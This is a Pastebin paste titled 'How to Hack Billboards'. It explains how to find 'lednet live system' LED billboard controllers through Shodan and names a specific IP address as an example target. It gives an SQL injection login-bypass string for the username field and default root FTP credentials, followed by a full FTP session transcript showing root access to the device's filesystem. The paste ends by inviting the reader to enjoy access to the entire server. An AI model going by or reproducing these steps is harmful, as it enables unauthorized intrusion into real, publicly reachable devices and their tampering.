Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- How to Hack Billboards
- Step 1. Register to shodan
- Step 2. Look up: title:"lednet live system"
- You'll find some!
- Example: 186.206.188.175:8060/en/main.html
- How to hack it? Well the Username Parameter is vulnerable to SQL Injection......
- So to login, paste
- -1558" OR 9005=9005 AND "UxGI"="UxGI
- in the username parameter and anything in the password input. Now click login!
- Also another vulnerability is a default password vuln. You can basically get root ftp access to all of these billboards....
- Username: root
- Password: 111111
- $ ftp 186.206.188.175
- Connected to 186.206.188.175.
- 220 Welcome to blah FTP service.
- Name ( 186.206.188.175): root
- 331 Please specify the password.
- Password:
- 230 Login successful.
- Remote system type is UNIX.
- Using binary mode to transfer files.
- ftp> cd /
- 250 Directory successfully changed.
- ftp> ls
- 229 Entering Extended Passive Mode (|||41314|).
- 150 Here comes the directory listing.
- drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
- drwxr-xr-x 7 0 0 0 May 21 18:08 dev
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
- drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
- drwxr-xr-x 1 0 0 36 Jan 01 1970 home
- drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
- lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
- drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
- drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
- dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
- drwxr-xr-x 1 0 0 116 Jan 01 1970 root
- drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
- drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
- drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
- drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
- drwxr-xr-x 3 0 0 672 Jan 01 1970 var
- drwxr-xr-x 4 0 0 288 Jan 01 1970 www
- 226 Directory send OK.
- ftp>
- You now have access to the entire server ;)
- Enjoy!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement